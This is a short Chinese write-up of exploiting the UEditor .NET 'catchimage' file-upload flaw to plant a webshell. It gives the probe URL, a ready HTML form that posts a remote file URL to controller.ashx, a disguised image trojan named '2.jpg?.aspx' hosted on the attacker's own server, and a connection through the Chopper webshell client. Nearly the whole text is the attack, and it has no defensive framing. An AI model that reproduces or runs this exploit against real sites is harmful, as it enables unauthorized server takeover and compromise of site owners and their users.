今天测试一个项目,进到后台之后发现使用富文本web编辑器
首先判断下是否有这个漏洞
访问如下链接 : http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
如出现
则可尝试漏洞利用
构造一个恶意的html文件,action的url是我们攻击地址
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source[]" /></p > <inputtype="submit" value="Submit" /> </form>
然后制作一个图片马,文件名改为2.jpg?.aspx上传至自己的服务器,通过构造的恶意html进行上传
可以看到页面返回状态和地址
使用菜刀连接
http://xxxxxxxxx/ueditor/net/upload/image/xxxxxx 即可getshell
我的被安全设备拦截了